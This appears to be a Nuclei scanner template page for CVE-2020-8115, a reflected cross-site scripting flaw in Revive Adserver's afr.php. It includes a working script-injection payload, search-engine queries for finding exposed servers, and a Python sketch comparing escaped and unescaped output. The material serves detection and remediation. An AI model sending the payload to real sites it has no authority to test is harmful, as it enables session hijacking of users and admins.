Revive Adserver <=5.0.3 - Cross-Site Scripting
ID: CVE-2020-8115
Severity: medium
Author: madrobot,dwisiswant0
Tags: cve,cve2020,xss,hackerone,revive-adserver
Description
Revive Adserver 5.0.3 and prior contains a reflected cross-site scripting vulnerability in the publicly accessible afr.php delivery script. In older versions, it is possible to steal the session identifier and gain access to the admin interface. The query string sent to the www/delivery/afr.php script is printed back without proper escaping, allowing an attacker to execute arbitrary JavaScript code on the browser of the victim.
YAML Source
id: CVE-2020-8115

info:
  name: Revive Adserver <=5.0.3 - Cross-Site Scripting
  author: madrobot,dwisiswant0
  severity: medium
  description: |
    Revive Adserver 5.0.3 and prior contains a reflected cross-site scripting vulnerability in the publicly accessible afr.php delivery script. In older versions, it is possible to steal the session identifier and gain access to the admin interface. The query string sent to the www/delivery/afr.php script is printed back without proper escaping, allowing an attacker to execute arbitrary JavaScript code on the browser of the victim.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement.
  remediation: There are currently no known exploits. As of 3.2.2, the session identifier cannot be accessed as it is stored in an http-only cookie.
  reference:
    - https://hackerone.com/reports/775693
    - https://www.revive-adserver.com/security/revive-sa-2020-001/
    - https://nvd.nist.gov/vuln/detail/CVE-2020-8115
    - https://github.com/Elsfa7-110/kenzer-templates
    - https://github.com/merlinepedra/nuclei-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2020-8115
    cwe-id: CWE-79
    epss-score: 0.0187
    epss-percentile: 0.88393
    cpe: cpe:2.3:a:revive-adserver:revive_adserver:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: revive-adserver
    product: revive_adserver
    shodan-query:
      - http.title:"revive adserver"
      - http.favicon.hash:106844876
    fofa-query:
      - icon_hash=106844876
      - title="revive adserver"
    google-query: intitle:"revive adserver"
  tags: cve,cve2020,xss,hackerone,revive-adserver

http:
  - method: GET
    path:
      - "{{BaseURL}}/www/delivery/afr.php?refresh=10000&\")',10000000);alert(1337);setTimeout('alert(\""

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - (?mi)window\.location\.replace\(".*alert\(1337\)

      - type: word
        part: body
        words:
          - window.location.href.indexOf
        negative: true

      - type: status
        status:
          - 200
# digest: 4b0a0048304602210091d11a130c95bbc974aa2456864400589d321ba1fece4af2f94e24365a02a02b022100a044bac1a3f74c46b161f1f1db5d5619a5d125ed32fe784b6345bde8cd6a8bc6:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2020/CVE-2020-8115.yaml"
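
Added example, not part of the original template or of Revive Adserver's code: a Python sketch that evaluates the template's three matchers against a constructed response that echoes the query string raw, and against a rendering that encodes it for the JavaScript string context. The two page shapes, the relative `/afr.php` URL and all function names are assumptions made for illustration.

```python
import json
import re
from urllib.parse import quote

# The three matchers from the template above, combined with "and".
REFLECTED = re.compile(r'(?mi)window\.location\.replace\(".*alert\(1337\)')
NEGATIVE_WORD = "window.location.href.indexOf"


def template_matches(status: int, body: str) -> bool:
    """Return True when status, regex and negative word matcher all agree."""
    return (status == 200
            and REFLECTED.search(body) is not None
            and NEGATIVE_WORD not in body)


def render_unescaped(query: str) -> str:
    # Constructed stand-in for the flaw: the raw query string is pasted into
    # a JavaScript string that setTimeout() later evaluates as code.
    return ("<script>setTimeout('window.location.replace(\"/afr.php?"
            + query + "\")', 10000);</script>")


def render_escaped(query: str) -> str:
    # Percent-encode everything except URL structure characters, emit the URL
    # as a JSON string literal, and hand setTimeout a function, not a string.
    url = "/afr.php?" + quote(query, safe="=&%")
    literal = json.dumps(url).replace("<", "\\u003c")
    return ("<script>setTimeout(function () { window.location.replace("
            + literal + "); }, 10000);</script>")


# Query string taken from the template's path entry.
PROBE = "refresh=10000&\")',10000000);alert(1337);setTimeout('alert(\""

if __name__ == "__main__":
    for name, render in (("unescaped", render_unescaped),
                         ("escaped", render_escaped)):
        body = render(PROBE)
        print(f"{name:10} match={template_matches(200, body)}")
        print(f"  {body}")
```
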